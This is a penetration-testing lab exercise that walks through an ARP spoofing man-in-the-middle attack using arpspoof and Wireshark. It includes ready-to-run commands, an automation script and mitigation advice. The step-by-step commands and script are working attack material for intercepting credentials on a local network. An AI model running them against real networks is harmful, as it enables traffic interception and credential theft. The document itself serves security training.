Exercise 4: ARP Spoofing Simulation

Objective

Perform an ARP spoofing attack to understand how it compromises network communication and analyze its impact using Wireshark.

Scenario

Imagine you’re a penetration tester tasked with assessing the security posture of a company’s internal network. One common threat in local networks is ARP spoofing, where an attacker tricks devices into sending traffic through their machine. In this exercise, you’ll simulate an ARP spoofing attack in a controlled environment to understand how it works and how it can be mitigated.

⚠️ Important: This exercise must only be performed in a legal and controlled lab environment. Unauthorized ARP spoofing is illegal and unethical.

Lab Instructions

Step 1: Set Up the Lab Environment

• Use two machines in the same network:
  • Attacker Machine: Linux system with arpspoof installed.
  • Victim Machine: Another system on the same network.
  • Gateway/Router: The network’s default gateway.
• Install arpspoof (part of the dsniff package) on the attacker machine:

sudo apt update sudo apt install dsniff -y

Step 2: Enable IP Forwarding

Enable IP forwarding to allow packet routing through the attacker machine:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Verify IP forwarding is enabled:

cat /proc/sys/net/ipv4/ip_forward

Output should be 1.

Step 3: Execute ARP Spoofing

Identify the IP address of the victim and the gateway:

ip a # On attacker machine 
arp -a # On victim machine

Launch the ARP spoofing attack:

sudo arpspoof -i <network_interface> -t <victim_IP> <gateway_IP> 
sudo arpspoof -i <network_interface> -t <gateway_IP> <victim_IP>

Replace <network_interface> with your active network interface (e.g., eth0, wlan0).

Replace <victim_IP> and <gateway_IP> with the respective IPs.

Step 4: Monitor Traffic with Wireshark

Open Wireshark on the attacker machine.

Select the correct network interface and start capturing packets.

Apply filters to observe sensitive traffic, e.g., HTTP requests:

http

Analyze how the victim’s traffic is now being routed through the attacker machine.

Step 5: Analyze the Impact

• Observe the victim’s browsing activity or credentials being transmitted in plaintext (if any).
• Discuss how ARP spoofing can lead to man-in-the-middle (MITM) attacks.

Step 6: Stop the Attack and Disable IP Forwarding

• Terminate arpspoof by pressing Ctrl + C.
• Disable IP forwarding:

echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward

Solution & Explanation

How ARP Spoofing Works

• Address Resolution Protocol (ARP): Translates IP addresses to MAC addresses in a local network.
• Spoofing: By sending forged ARP replies, the attacker tricks the victim and gateway into routing traffic through the attacker’s machine.

Captured Traffic Analysis

• Wireshark captures show that the victim’s traffic is redirected.
• If unsecured protocols are used (e.g., HTTP, FTP), sensitive data can be exposed.

Impact

• Data Interception: Login credentials, session cookies, and sensitive data can be stolen.
• Denial of Service: Manipulating ARP tables can disrupt communication.

Mitigation Techniques

1. Static ARP Entries:
   • Manually assign static ARP entries to prevent unauthorized changes:

sudo arp -s <IP_address> <MAC_address>

1. Enable Dynamic ARP Inspection (DAI):
   • On managed switches to validate ARP requests.
2. Use Secure Protocols:
   • Prefer encrypted connections (HTTPS, SSH) to protect data even if intercepted.
3. Network Segmentation:
   • Isolate critical systems to limit exposure.
4. Intrusion Detection Systems (IDS):
   • Deploy tools that detect ARP spoofing behavior.

Testing & Verification

• Verify if traffic was intercepted by analyzing captured packets in Wireshark.
• Check the ARP table on the victim machine during and after the attack:

arp -a

• Ensure mitigation techniques (e.g., static ARP entries) prevent spoofing.

Additional Script (Optional)

Automate IP forwarding and ARP spoofing with this script:

#!/bin/bash
# Enable IP forwarding
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

# Start ARP spoofing
sudo arpspoof -i eth0 -t 192.168.1.5 192.168.1.1 &
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.5 &

Terminate with:

sudo killall arpspoof

Conclusion

In this exercise, you successfully simulated an ARP spoofing attack to understand how network packets can be intercepted and analyzed. You also learned mitigation strategies to protect networks against this threat. Understanding these techniques helps strengthen cybersecurity defenses and protect sensitive data.